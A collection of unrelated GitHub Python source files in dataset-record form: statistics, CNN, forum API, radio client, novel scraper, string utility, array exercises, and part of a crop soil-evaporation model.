BodyPartController.computeStats(pain_levels)\n\n return total_stats\n\n # Given a list of pain entries (see computeBodyPartStats()), returns the\n # stats for each time of day.\n @staticmethod\n def computeDaytimeStats(pain_entries):\n daytime_stats = {key:{} for key in day_times.keys()}\n for time_of_day in day_times:\n daytime_levels = [pain_entry['pain_level'] for pain_entry in pain_entries if (pain_entry['daytime'] == time_of_day)]\n daytime_stats[time_of_day] = BodyPartController.computeStats(daytime_levels)\n\n return daytime_stats\n\n # Given a list of pain entries (see computeBodyPartStats()) that are\n # sorted by date, returns the stats for each day.\n @staticmethod\n def computeCalendarStats(pain_entries):\n current_day_levels = []\n current_day = pain_entries[0]['date'].date()\n calendar_stats = []\n\n for entry in pain_entries:\n entry_day = entry['date'].date()\n if entry_day != current_day:\n daily_stats = {\n 'date': current_day,\n 'stats': BodyPartController.computeStats(current_day_levels)\n }\n calendar_stats.append(daily_stats)\n current_day = entry_day\n current_day_levels = []\n current_day_levels.append(entry['pain_level'])\n daily_stats = {\n 'date': current_day,\n 'stats': BodyPartController.computeStats(current_day_levels)\n }\n calendar_stats.append(daily_stats)\n\n return calendar_stats\n\n # Given a list of stats for each day (in order of date), returns the\n # moving stats (e.g. 
moving average) using a 3 day window by default.\n @staticmethod\n def computeMovingStats(calendar_stats, movingWindowSize=3):\n high_queue = queue.Queue()\n low_queue = queue.Queue()\n mean_queue = queue.Queue()\n std_dev_queue = queue.Queue()\n moving_stats = []\n\n for (i, daily_stat) in enumerate(calendar_stats):\n high_queue.put(daily_stat['stats']['high'])\n low_queue.put(daily_stat['stats']['low'])\n mean_queue.put(daily_stat['stats']['mean'])\n std_dev_queue.put(daily_stat['stats']['stdev'])\n\n if high_queue.qsize() > movingWindowSize:\n high_queue.get()\n low_queue.get()\n mean_queue.get()\n std_dev_queue.get()\n\n if high_queue.qsize() == movingWindowSize:\n stats = {\n 'high': mean(list(high_queue.queue)),\n 'low': mean(list(low_queue.queue)),\n 'mean': mean(list(mean_queue.queue)),\n 'stdev': mean(list(std_dev_queue.queue)),\n }\n daily_moving_stats = {\n 'date': calendar_stats[i - movingWindowSize // 2]['date'],\n 'stats': stats\n }\n moving_stats.append(daily_moving_stats)\n\n return moving_stats\n\n # Given a list of stats for each day (in order of date), returns the\n # histogram for max, min, median, and mean.\n @staticmethod\n def computeHistogram(calendar_stats):\n histogram = {\n 'high': initial_histogram.copy(),\n 'low': initial_histogram.copy(),\n 'median': initial_histogram.copy(),\n 'mean': initial_histogram.copy(),\n 'num_days': len(calendar_stats)\n }\n for daily_stat in calendar_stats:\n stats = daily_stat['stats']\n BodyPartController.addPainLevelToHist(stats['high'], histogram['high'])\n BodyPartController.addPainLevelToHist(stats['low'], histogram['low'])\n BodyPartController.addPainLevelToHist(stats['median'], histogram['median'])\n BodyPartController.addPainLevelToHist(stats['mean'], histogram['mean'])\n\n return histogram\n\n # Given a list of pain levels, returns a dict containing the max, min, mean,\n # median, stddev, and number of entries.\n @staticmethod\n def computeStats(pain_levels):\n dev = 0\n if len(pain_levels) == 0:\n return None\n elif len(pain_levels) > 1:\n dev = stdev(pain_levels)\n return {\n 'high': max(pain_levels),\n 'low': min(pain_levels),\n 'mean': mean(pain_levels),\n 'median': median(pain_levels),\n 'stdev': dev,\n 'num_entries': len(pain_levels)\n }\n\n # Given a pain level and a histogram, adds 1 to the corresponding bucket of\n # the histogram.\n @staticmethod\n def addPainLevelToHist(pain_level, histogram):\n if histogram_map['none'][0] <= pain_level < histogram_map['none'][1]:\n histogram['none'] += 1\n elif histogram_map['low'][0] <= pain_level < histogram_map['low'][1]:\n histogram['low'] += 1\n elif histogram_map['medium'][0] <= pain_level < histogram_map['medium'][1]:\n histogram['medium'] += 1\n elif histogram_map['high'][0] <= pain_level < histogram_map['high'][1]:\n histogram['high'] += 1\n elif histogram_map['xHigh'][0] <= pain_level <= histogram_map['xHigh'][1]:\n histogram['xHigh'] += 1\n","repo_name":"mmanhard/pain_control_backend","sub_path":"src/controllers/body_parts.py","file_name":"body_parts.py","file_ext":"py","file_size_in_byte":8008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"86719069064","text":"from __future__ import print_function ### if using python 2.7\nimport tensorflow as tf\n\n\n# TODO: Allow explicit definition of activation function for each layer (including output layer)\n# TODO: Add dropout functionality\n# TODO: Regularization\n# TODO: Add more evaluation metrics\n# TODO: Implement tf.Saver functionality\nclass CNN:\n \"\"\"\n 
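computeMovingStats drives four queue.Queue objects by hand; `collections.deque(maxlen=...)` expresses the same sliding window more directly, because it evicts the oldest day automatically once the window is full. A sketch over (day, mean) pairs, assuming consecutive integer day labels:

```python
# Sliding-window means with deque instead of hand-managed Queue objects.
from collections import deque
from statistics import mean

def moving_means(daily_means, window=3):
    buf = deque(maxlen=window)  # oldest value drops out automatically
    out = []
    for day, value in daily_means:
        buf.append(value)
        if len(buf) == window:
            # centre the window on its middle day, as the controller does
            out.append((day - window // 2, mean(buf)))
    return out

print(moving_means([(1, 2.0), (2, 4.0), (3, 6.0), (4, 8.0)]))
# [(2, 4.0), (3, 6.0)]
```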
Implements a Convolutional Neural Network in TensorFlow\n\n Constructor Arguments\n ---------------------\n\n configuration (dict):\n structure (list) - Defines the structure of the CNN\n \"INPUT:h,w,d\" - Input layer of size [h x w x d] (not flattened)\n\n \"CONV:fh,fw,fd,k:s\"\n - Convolutional layer with k filters (or features),\n filter size of [fh x fw x fd], stride of [1, s, s, 1],\n and SAME zero-padding\n\n \"MAXPOOL:h,w:s\"\n - Max pooling layer with subsample size of [h x w],\n stride of [1, s, s, 1], and SAME zero-padding\n\n \"FC:n\" - Fully-connected layer with n hidden neurons\n \"OUTPUT:n\" - Output layer of size n\n\n activation - Activation function of neurons (except output layer)\n in network\n cost_function - Cost function of CNN\n optimizer - Initalized TF optimizer\n num_epochs - Number of epochs to run\n batch_size - Size of training batches\n display_step - When to display logs per epoch step\n\n train_dataset (DataSet): Training data in the form of a DataSet object\n\n\n Usage:\n\n from __future__ import print_function ### if using python 2.7\n import tensorflow as tf\n from tensorflow.examples.tutorials.mnist import input_data\n\n from cnn import CNN\n from dataset import DataSet\n\n mnist_config = {\n \"structure\": [\"INPUT:28,28,1\",\n \"CONV:5,5,1,32:1\",\n \"MAXPOOL:2,2:2\",\n \"CONV:5,5,32,64:1\",\n \"MAXPOOL:2,2:2\",\n \"FC:1024\",\n \"OUTPUT:10\"],\n \"activation\": tf.nn.relu,\n \"optimizer\": tf.train.AdamOptimizer(learning_rate=1e-4),\n \"cost_function\": tf.nn.softmax_cross_entropy_with_logits,\n \"learning_rate\": 1e-4,\n \"num_epochs\": 1,\n \"batch_size\": 100,\n \"display_step\": 1\n }\n\n mnist = input_data.read_data_sets('MNIST_data', one_hot=True) ### Also saves MNIST data to disk\n mnist_train_dataset = DataSet(mnist.train.images.reshape((-1, 28, 28, 1)), mnist.train.labels)\n mnist_test_dataset = DataSet(mnist.test.images.reshape((-1, 28, 28, 1)), mnist.test.labels)\n mnist_cnn = CNN(mnist_config, mnist_train_dataset)\n mnist_cnn.train()\n print('Final Test Accuracy: ', mnist_cnn.test(mnist_test_dataset))\n\n \"\"\"\n def __init__(self, configuration, train_dataset):\n self.load_configuration(configuration)\n self.train_dataset = train_dataset\n\n def build_model(self):\n input_layer = self.structure[0]\n (input_height, input_width, input_depth) = tuple(map(int, input_layer.split(\":\")[1].split(\",\")))\n\n # Setup input\n self.x = tf.placeholder(tf.float32, shape=[None, input_height, input_width, input_depth])\n\n output_layer = self.structure[-1]\n output_layer_size = int(output_layer.split(\":\")[1])\n self.y = tf.placeholder(tf.float32, shape=[None, output_layer_size])\n\n self.weights = []\n self.biases = []\n\n hidden_layer_structure = self.structure[1:-1]\n self.hidden_layers = []\n\n for index, layer in enumerate(hidden_layer_structure):\n # Debugging\n print(layer)\n\n if \"CONV\" in layer:\n (_, filter_dim, stride) = layer.split(\":\")\n stride = int(stride)\n (filter_height, filter_width, filter_depth, num_filters) = tuple(map(int, filter_dim.split(\",\")))\n\n weights = self.create_weight_variable([filter_height, filter_width, filter_depth, num_filters])\n biases = self.create_bias_variable([num_filters])\n\n self.weights.append(weights)\n self.biases.append(biases)\n\n # Check if the conv layer is the first hidden layer\n if index == 0:\n self.hidden_layers.append(self.activation(\n self.conv2d(self.x, weights, [1, stride, stride, 1]) + biases))\n else:\n self.hidden_layers.append(self.activation(\n 
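The structure strings in the docstring above are purely positional ('TYPE:dims[:stride]'); a parser along these lines (illustrative, not part of the class) recovers the numbers build_model needs:

```python
# Small parser for the "TYPE:dims[:stride]" layer specs described above.
def parse_layer(spec):
    kind, *rest = spec.split(":")
    if kind in ("INPUT", "FC", "OUTPUT"):
        return kind, tuple(int(n) for n in rest[0].split(","))
    if kind in ("CONV", "MAXPOOL"):
        dims = tuple(int(n) for n in rest[0].split(","))
        return kind, dims + (int(rest[1]),)   # last element is the stride
    raise ValueError(f"unknown layer spec: {spec}")

print(parse_layer("CONV:5,5,1,32:1"))   # ('CONV', (5, 5, 1, 32, 1))
print(parse_layer("MAXPOOL:2,2:2"))     # ('MAXPOOL', (2, 2, 2))
print(parse_layer("FC:1024"))           # ('FC', (1024,))
```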
self.conv2d(self.hidden_layers[index-1], weights, [1, stride, stride, 1]) + biases))\n\n elif \"MAXPOOL\" in layer:\n (_, window_dim, stride) = layer.split(\":\")\n stride = int(stride)\n (height, width) = tuple(map(int, window_dim.split(\",\")))\n self.hidden_layers.append(\n self.max_pool(\n self.hidden_layers[index-1],\n [1, height, width, 1],\n [1, stride, stride, 1]\n )\n )\n\n elif \"FC\" in layer:\n num_units = int(layer.split(\":\")[1])\n\n # Check if FC layer is the first layer after the input layer\n prev_layer = self.x if index == 0 else self.hidden_layers[index - 1]\n\n (_, height, width, depth) = prev_layer.get_shape().dims\n prev_layer_size = int(height) * int(width) * int(depth)\n\n # Flatten previous layer\n prev_layer = tf.reshape(self.hidden_layers[index - 1],\n [-1, prev_layer_size])\n\n weights = self.create_weight_variable(\n [prev_layer_size, num_units])\n biases = self.create_bias_variable([num_units])\n\n self.weights.append(weights)\n self.biases.append(biases)\n\n self.hidden_layers.append(\n self.activation(tf.matmul(prev_layer, weights) + biases)\n )\n\n # Get last hidden layer of network\n last_hidden_layer = self.hidden_layers[-1]\n\n # Get dimensions of last hidden layer\n last_hidden_layer_dims = last_hidden_layer.get_shape().dims\n\n # Check if last hidden layer is not flat\n if len(last_hidden_layer_dims) == 4:\n (_, height, width, depth) = last_hidden_layer_dims\n last_hidden_layer_size = int(height) * int(width) * int(depth)\n\n # Flatten last hidden layer\n last_hidden_layer = tf.reshape(last_hidden_layer,\n [-1, last_hidden_layer_size])\n elif len(last_hidden_layer_dims) == 2:\n (_, last_hidden_layer_size) = last_hidden_layer_dims\n last_hidden_layer_size = int(last_hidden_layer_size)\n\n # Create output layer weights and biases\n output_layer_weights = self.create_weight_variable([last_hidden_layer_size, output_layer_size])\n output_layer_biases = self.create_bias_variable([output_layer_size])\n\n # Linear transformation of last hidden layer\n self.output = tf.matmul(last_hidden_layer, output_layer_weights) + output_layer_biases\n\n # Output prediction of model\n # See todo about activation function customization\n self.y_pred = tf.nn.softmax(self.output)\n\n # Determine cost of model\n self.cost = tf.reduce_mean(self.cost_function(self.output, self.y))\n\n # Define training step\n self.train_step = self.optimizer.minimize(self.cost)\n\n # Determine correct predictions\n correct_prediction = tf.equal(\n tf.cast(tf.argmax(self.y_pred, 1), tf.float32),\n tf.cast(tf.argmax(self.y, 1), tf.float32)\n )\n\n # Define accuracy measure\n self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n def train(self):\n \"\"\" Handles CNN training \"\"\"\n\n # Build CNN model\n self.build_model()\n print(\"Finished building CNN model\")\n\n # Save TF Session to instance\n self.sess = tf.Session()\n self.sess.run(tf.initialize_all_variables())\n\n for epoch in range(self.num_epochs):\n avg_cost = 0.0\n total_batch = int(self.train_dataset.num_examples / self.batch_size)\n # Loop over all batches\n for i in range(total_batch):\n batch_x, batch_y = self.train_dataset.next_batch(self.batch_size)\n # Run optimization op (backprop) and cost op (to get loss value)\n _, cost = self.sess.run([self.train_step, self.cost],\n feed_dict={\n self.x: batch_x,\n self.y: batch_y\n })\n # Compute average loss\n avg_cost += cost / total_batch\n # Debugging purposes\n print(\"Mini-batch %d\"%i, \"cost=\", \"{:.9f}\".format(cost))\n\n # Display logs per epoch step\n if 
epoch % self.display_step == 0:\n print(\"Epoch:\", '%04d' % (epoch+1), \"cost=\", \"{:.9f}\".format(avg_cost))\n\n def test(self, test_dataset):\n return self.accuracy.eval(\n {self.x: test_dataset.features, self.y: test_dataset.labels},\n session=self.sess # Use trained model\n )\n\n def create_weight_variable(self, shape):\n \"\"\" Initalize weights using truncated normal distribution \"\"\"\n return tf.Variable(tf.truncated_normal(shape, stddev=0.1))\n\n def create_bias_variable(self, shape):\n \"\"\" Intialize neurons with slightly positive bias \"\"\"\n return tf.constant(0.1, shape=shape)\n\n def conv2d(self, x, weights, strides):\n \"\"\" Compute 2D convolution of given x and weights (filter) \"\"\"\n return tf.nn.conv2d(x, weights, strides=strides, padding=\"SAME\")\n\n def max_pool(self, x, ksize, strides):\n \"\"\" Compute max-pooling \"activations\" \"\"\"\n return tf.nn.max_pool(x, ksize=ksize, strides=strides, padding=\"SAME\")\n\n def avg_pool(self, x, ksize, strides):\n # TODO: Implement average pooling\n pass\n\n def load_configuration(self, config):\n \"\"\" Sets configuration variables \"\"\"\n self.structure = config[\"structure\"]\n self.cost_function = config[\"cost_function\"]\n self.activation = config[\"activation\"]\n self.optimizer = config[\"optimizer\"]\n\n self.num_epochs = config[\"num_epochs\"]\n self.display_step = config[\"display_step\"]\n self.batch_size = config[\"batch_size\"]\n","repo_name":"young-jon/biotensorflow","sub_path":"cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":10650,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"7852288156","text":"\nfrom fastapi import APIRouter, Query\nfrom datetime import datetime\nfrom sqlalchemy import or_, and_\nfrom database import SessionLocal\nfrom typing import Optional\nimport models\n\ndb = SessionLocal()\n\n\nrouter = APIRouter(\n prefix=\"/forum\",\n responses={404: {\"description\": \"Not found\"}},\n tags=[\"Forum\"]\n)\n\n\n@router.post(\"/get_create_user\", status_code=200)\ndef getOrCreateUser(email:str):\n user = db.query(models.User).filter(models.User.email == email).first()\n if user:\n return user\n else:\n new_user = models.User(\n email=email,\n last_active=datetime.now()\n )\n db.add(new_user)\n db.commit()\n db.refresh(new_user)\n return new_user\n\n\n@router.get(\"/\", status_code=200)\nasync def getForums(string_filter: Optional[str] = Query(None)):\n print(\"String filter\", string_filter)\n if string_filter == \"\" or string_filter == None:\n forums = db.query(models.Thread).all()\n return forums\n forums = db.query(models.Thread).filter(\n and_(\n or_(models.Thread.title.ilike(f\"%{string_filter}%\"), models.Thread.body.ilike(f\"%{string_filter}%\")),\n models.Thread.is_forum == True\n )\n ).all()\n return forums\n\n@router.post('/', status_code=201)\ndef createForum(forum: models.CreateCommentWithEmail):\n\n user = getOrCreateUser(forum.email)\n\n new_forum = models.Thread(\n is_forum=True,\n title=forum.title,\n body=forum.body,\n user_id=user.id,\n created_time=datetime.now(),\n tags=[]\n )\n db.add(new_forum)\n db.commit()\n db.refresh(new_forum)\n return new_forum\n\n@router.get(\"/{forum_id}\", status_code=200)\ndef getForum(forum_id: int):\n \"\"\"Returns the forum details and an array of comments recurively\n\n Args:\n forum_id (int): The id of the forum\n\n \"\"\"\n def getCommentsOfParentId(parent_id, depth=0, max_depth=10):\n if depth >= max_depth:\n return []\n\n forum_data = {}\n comments_list = 
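getOrCreateUser above is the classic query-then-insert idiom; stripped of the ORM it reduces to a lookup with a fallback insert. A purely illustrative, database-free version:

```python
# Get-or-create against a dict-backed store (illustration only).
users = {}

def get_or_create_user(email):
    if email in users:
        return users[email]               # query hit: return the existing record
    users[email] = {"email": email, "id": len(users) + 1}
    return users[email]                   # miss: insert, then return the new record

print(get_or_create_user("a@example.com"))  # created
print(get_or_create_user("a@example.com"))  # same record, no duplicate
```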
[]\n\n forum = db.query(models.Thread).filter(models.Thread.thread_id == forum_id).first()\n if not forum:\n return forum_data # Return empty data if the forum does not exist\n\n comments = db.query(models.Thread).filter(models.Thread.parent_id == parent_id).all()\n\n for comment in comments:\n # print(comment, comment.thread_id, comment.parent_id)\n # comment_data = getCommentsOfParentId(comment.thread_id, depth + 1, max_depth)\n # comments_list.append(comment_data)\n # forum = db.query(models.Thread).filter(models.Thread.thread_id == forum_id).first()\n # if not forum:\n # return forum_data # Return empty data if the forum does not exist\n\n comments = db.query(models.Thread).filter(models.Thread.parent_id == comment.thread_id).all()\n comments_list.append({\"forum\": comment, \"comments\": comments})\n\n forum_data[\"forum\"] = forum\n forum_data[\"comments\"] = comments_list\n\n return forum_data\n\n forum_data = getCommentsOfParentId(forum_id)\n return forum_data\n\n\n@router.post(\"/comments\", status_code=201)\ndef createComment(comment: models.CreateCommentWithEmail):\n \"\"\"Creates a comment on a forum or thread\n\n Args:\n forum_id (int): The id of the forum or thread\n\n \"\"\"\n\n user = getOrCreateUser(comment.email)\n\n new_comment = models.Thread(\n is_forum=False,\n body=comment.body,\n user_id=user.id,\n title=comment.title,\n parent_id=comment.parent_id,\n tags=[],\n created_time=datetime.now()\n )\n db.add(new_comment)\n db.commit()\n db.refresh(new_comment)\n return new_comment\n\n\n\n\n\n","repo_name":"NeneWang/sase_backend_2023","sub_path":"routes/forumRoutes.py","file_name":"forumRoutes.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20254250809","text":"import aiohttp\n\nfrom sprapi.classes import Information\n\n\nclass SPRadioApi:\n __api_url = 'https://radio.spworlds.city/api'\n\n async def __request_get(self, path: str = None):\n session = aiohttp.ClientSession()\n\n async with session.get(self.__api_url + path) as response:\n result = await response.json()\n await session.close()\n return result\n\n async def get_information(self) -> Information:\n res = await self.__request_get(\"/nowplaying/1\")\n return Information(res)\n\n async def get_now_playing(self):\n info = await self.get_information()\n return info.now_playing\n","repo_name":"teleportx/sp-radio-bot","sub_path":"sprapi/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"74733469830","text":"import requests\r\nimport re\r\nimport time\r\n\r\nheaders = {\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'\r\n}\r\n\r\nf = open('./doupo.txt','a+')\r\n\r\ndef get_info(url):\r\n res = requests.get(url,headers=headers)\r\n if res.status_code == 200:\r\n contents = re.findall('
<p>(.*?)</p>
',res.content.decode('utf-8'),re.S)\r\n for content in contents:\r\n f.write(content+'\\n')\r\n else:\r\n pass\r\n\r\nif __name__ == '__main__':\r\n urls = ['http://www.doupoxs.com/doupocangqiong/{}.html'.format(str(i)) for i in range(2,1665)]\r\n for url in urls:\r\n get_info(url)\r\n time.sleep(1)\r\n f.close()\r\n","repo_name":"huankiki/DataProcBeginner","sub_path":"crawler_python_from_scratch/book_src/doupo_xiaoshuo.py","file_name":"doupo_xiaoshuo.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"16620068693","text":"def spacer(words=None, notif=True, copy=True) -> str:\n from .basicfunctions import argv, indextest, copycheck, notifcheck\n\n words = words or \" \".join(argv[2:])\n converted = []\n indextest(\n [\n \"Huh.\",\n \"\"\"It seems that you did not input anything to space out.\nTry running 'help spacer' if you do not know what you are doing.\"\"\",\n 5,\n ]\n )\n for i in words:\n converted.append(i)\n converted.append(\" \")\n copycheck(copy, \"\".join(converted))\n notifcheck(notif, [\"Success!\", \"Message copied to clipboard.\", 2])\n return \"\".join(converted)\n","repo_name":"prokenz101/utilities-py","sub_path":"functions/spacer.py","file_name":"spacer.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"71975137351","text":"class Solutions:\n \n def findMaxConsecutiveOnes(self, nums: list[int]) -> int:\n _max = count = 0\n for i in nums:\n count = (count + i) * i # a 0 resets the count to 0, a 1 adds 1\n if count > _max:\n _max = count\n return _max\n\n def findPoisonedDuration(self, timeSeries: list[int], duration: int) -> int:\n t = 0\n if len(timeSeries) == 1:\n return duration\n last = timeSeries[0]\n for fast in timeSeries[1:]:\n if fast - last > duration:\n t += duration\n else:\n t += fast - last\n last = fast\n return t + duration\n\n def thirdMax(self, nums: list[int]) -> int:\n nums = list(set(nums))\n nums.sort(reverse=True)\n return nums[0] if len(nums) < 3 else nums[2]\n\n def maximumProduct(self, nums: list[int]) -> int:\n nums.sort(reverse=True)\n k = nums[0]*nums[1]*nums[2]\n i = nums[0]*nums[-1]*nums[-2]\n return i if i>k else k\n ","repo_name":"Chenpeel/Codes","sub_path":"Python/algo_codes/solu_py/array/traverse_array.py","file_name":"traverse_array.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73750411273","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# AquaCrop crop growth model\n\nimport numpy as np\n\nimport logging\nlogger = logging.getLogger(__name__)\n\nclass SoilEvaporation(object):\n \"\"\"Class to represent daily soil evaporation\"\"\"\n\n def __init__(self, SoilEvaporation_variable):\n self.var = SoilEvaporation_variable\n\n def initial(self):\n arr_zeros = np.zeros((self.var.nCrop, self.var.nLat, self.var.nLon))\n self.var.Epot = np.copy(arr_zeros)\n self.var.Stage2 = np.copy(arr_zeros.astype(bool))\n self.var.EvapZ = np.copy(arr_zeros)\n self.var.Wstage2 = np.copy(arr_zeros)\n self.var.Wsurf = np.copy(arr_zeros)\n self.var.Wevap_Act = np.copy(arr_zeros)\n self.var.Wevap_Sat = np.copy(arr_zeros)\n self.var.Wevap_Fc = np.copy(arr_zeros)\n self.var.Wevap_Wp = np.copy(arr_zeros)\n self.var.Wevap_Dry = np.copy(arr_zeros)\n\n def reset_initial_conditions(self):\n pass\n\n def evap_layer_water_content(self):\n \"\"\"Function to get water contents in 
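findMaxConsecutiveOnes above replaces the usual if/else with arithmetic: (count + i) * i zeroes the streak on a 0 and extends it on a 1. Traced on a small input:

```python
# Trace of the (count + i) * i streak trick.
nums = [1, 1, 0, 1, 1, 1]
count = best = 0
for i in nums:
    count = (count + i) * i   # 0 -> streak resets; 1 -> streak grows by one
    best = max(best, count)
print(best)  # 3 -- counts run 1, 2, 0, 1, 2, 3
```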
the evaporation layer\"\"\"\n if np.any(self.var.GrowingSeasonDayOne):\n self.reset_initial_conditions()\n \n arr_ones = np.ones((self.var.nCrop, self.var.nLat, self.var.nLon))\n dz = self.var.dz[None,:,None,None] * arr_ones[:,None,:,:]\n dzsum = self.var.dzsum[None,:,None,None] * arr_ones[:,None,:,:]\n\n # Find compartments covered by evaporation layer\n evapz_comp = self.var.EvapZ[:,None,:,:] * np.ones((self.var.nComp))[None,:,None,None]\n comp_sto = (np.round((dzsum - dz) * 1000) < np.round(evapz_comp * 1000))\n factor = 1 - ((dzsum - evapz_comp) / dz)\n factor = np.clip(factor, 0, 1) * comp_sto\n\n # Water storages in evaporation layer (mm)\n Wevap_Act = np.sum((factor * 1000 * self.var.th * dz), axis=1)\n self.var.Wevap_Act = np.clip(Wevap_Act, 0, None)\n self.var.Wevap_Sat = np.sum((factor * 1000 * self.var.th_s_comp * dz), axis=1)\n self.var.Wevap_Fc = np.sum((factor * 1000 * self.var.th_fc_comp * dz), axis=1)\n self.var.Wevap_Wp = np.sum((factor * 1000 * self.var.th_wp_comp * dz), axis=1)\n self.var.Wevap_Dry = np.sum((factor * 1000 * self.var.th_dry_comp * dz), axis=1)\n\n def prepare_stage_two_evaporation(self):\n self.evap_layer_water_content()\n Wstage2 = ((self.var.Wevap_Act - (self.var.Wevap_Fc - self.var.REW)) / (self.var.Wevap_Sat - (self.var.Wevap_Fc - self.var.REW)))\n Wstage2 = (np.round((Wstage2 * 100)) / 100)\n Wstage2 = np.clip(Wstage2, 0, None)\n # self.var.Wstage2 = Wstage2\n return Wstage2\n\n def potential_soil_evaporation_rate(self, tAdj):\n\n # No canopy cover outside of growing season so potential soil\n # evaporation only depends on reference evapotranspiration\n et0 = self.var.referencePotET[None,:,:] * np.ones((self.var.nCrop))[:,None,None] \n EsPot = (self.var.Kex * et0)\n\n # Calculate maximum potential soil evaporation and potential soil\n # evaporation given current canopy size\n EsPotMax = (self.var.Kex * et0 * (1 - self.var.CCxW * (self.var.fwcc / 100)))\n EsPot[self.var.GrowingSeasonIndex] = (self.var.Kex * (1 - self.var.CCadj) * et0)[self.var.GrowingSeasonIndex]\n\n # Adjust potential soil evaporation for effects of withered canopy\n cond3 = (self.var.GrowingSeasonIndex & (tAdj > self.var.Senescence) & (self.var.CCxAct > 0))\n mult = np.ones((self.var.nCrop, self.var.nLat, self.var.nLon))\n cond31 = (cond3 & (self.var.CC > (self.var.CCxAct / 2)))\n cond311 = (cond31 & (self.var.CC > self.var.CCxAct))\n mult[cond311] = 0\n cond312 = (cond31 & np.logical_not(cond311))\n mult_divd = (self.var.CCxAct - self.var.CC)\n mult_divs = (self.var.CCxAct / 2)\n mult[cond312] = np.divide(mult_divd, mult_divs, out=np.zeros_like(mult_divs), where=mult_divs!=0)[cond312]\n\n EsPot[cond3] = (EsPot * (1 - self.var.CCxAct * (self.var.fwcc / 100) * mult))[cond3]\n CCxActAdj = ((1.72 * self.var.CCxAct) + (self.var.CCxAct ** 2) - 0.3 * (self.var.CCxAct ** 3))\n EsPotMin = np.zeros((self.var.nCrop, self.var.nLat, self.var.nLon))\n EsPotMin[cond3] = (self.var.Kex * (1 - CCxActAdj) * et0)[cond3]\n EsPotMin = np.clip(EsPotMin, 0, None)\n\n # Line 85-89 of AOS_SoilEvaporation.m\n EsPot[cond3] = np.clip(EsPot, EsPotMin, EsPotMax)[cond3]\n\n cond4 = (self.var.GrowingSeasonIndex & self.var.PrematSenes)\n EsPot[cond4] = np.clip(EsPot, None, EsPotMax)[cond4]\n # self.EsPot = EsPot\n return EsPot\n\n def adjust_potential_soil_evaporation_for_irrigation(self, EsPot):\n EsPotIrr = np.copy(EsPot)\n cond1 = ((irr_depth > 0) & (irr_method != 4))\n cond11 = (cond1 & ((prec > 0) | (surface_storage > 0)))\n EsPotIrr[cond11] = EsPot[cond11]\n cond12 = (cond1 & np.logical_not(cond11))\n 
EsPotIrr[cond12] = (EsPot * (wet_surf / 100))[cond12] # TODO: more informative name for wet_surf\n return EsPotIrr\n\n def adjust_potential_soil_evaporation_for_mulches(self, EsPot):\n\n # NB if surface is flooded then there is no adjustment of potential soil\n # evaporation, regardless of mulches \n EsPotMul = np.copy(EsPot)\n cond1 = (self.var.SurfaceStorage < 0.000001)\n cond11 = (cond1 & (self.var.Mulches == 1))\n cond111 = (cond11 & self.var.GrowingSeasonIndex)\n EsPotMul[cond111] = (EsPot * (1 - self.var.fMulch * (self.var.MulchPctGS / 100)))[cond111]\n cond112 = (cond11 & np.logical_not(self.var.GrowingSeasonIndex))\n EsPotMul[cond112] = (EsPot * (1 - self.var.fMulch * (self.var.MulchPctOS / 100)))[cond112]\n return EsPotMul\n\n def extract_water(self, ToExtract, ToExtractStg):\n arr_ones = np.ones((self.var.nCrop, self.var.nLat, self.var.nLon))\n arr_zeros = np.zeros((self.var.nCrop, self.var.nLat, self.var.nLon))\n dz = self.var.dz[None,:,None,None] * arr_ones[:,None,:,:]\n dzsum = self.var.dzsum[None,:,None,None] * arr_ones[:,None,:,:]\n\n # Determine fraction of compartments covered by evaporation layer\n evapzmin_comp = self.var.EvapZmin[:,None,:,:] * np.ones((self.var.nComp))[None,:,None,None]\n comp_sto = (np.round((dzsum - dz) * 1000) < np.round(evapzmin_comp * 1000))\n factor = 1 - ((dzsum - evapzmin_comp) / dz)\n factor = np.clip(factor, 0, 1) * comp_sto\n\n comp_sto = np.sum(comp_sto, axis=1)\n comp = 0\n while np.any((comp < comp_sto) & (ToExtractStg > 0) & (ToExtract > 0)):\n\n cond101 = ((comp < comp_sto) & (ToExtractStg > 0) & (ToExtract > 0))\n\n # Water available in compartment for extraction (mm)\n Wdry = 1000 * self.var.th_dry_comp[:,comp,...] * dz[:,comp,...] \n W = 1000 * self.var.th[:,comp,...] * dz[:,comp,...]\n AvW = np.copy(arr_zeros)\n AvW[cond101] = ((W - Wdry) * factor[:,comp,...])[cond101]\n AvW = np.clip(AvW, 0, None)\n\n # Determine amount by which to adjust variables\n cond1011 = (cond101 & (AvW >= ToExtractStg))\n self.var.EsAct[cond1011] += ToExtractStg[cond1011]\n W[cond1011] -= ToExtractStg[cond1011]\n ToExtract[cond1011] -= ToExtractStg[cond1011]\n ToExtractStg[cond1011] = 0\n\n cond1012 = (cond101 & np.logical_not(cond1011))\n self.var.EsAct[cond1012] += AvW[cond1012]\n W[cond1012] -= AvW[cond1012]\n ToExtract[cond1012] -= AvW[cond1012]\n ToExtractStg[cond1012] -= AvW[cond1012]\n\n # Update water content\n self.var.th[:,comp,...][cond101] = (W / (1000 * dz[:,comp,...]))[cond101]\n comp += 1\n\n def relative_depletion(self):\n\n # Get current water storage\n self.evap_layer_water_content()\n\n # Get water storage (mm) at start of stage 2 evaporation\n Wupper = (self.var.Wstage2 * (self.var.Wevap_Sat - (self.var.Wevap_Fc - self.var.REW)) + (self.var.Wevap_Fc - self.var.REW))\n 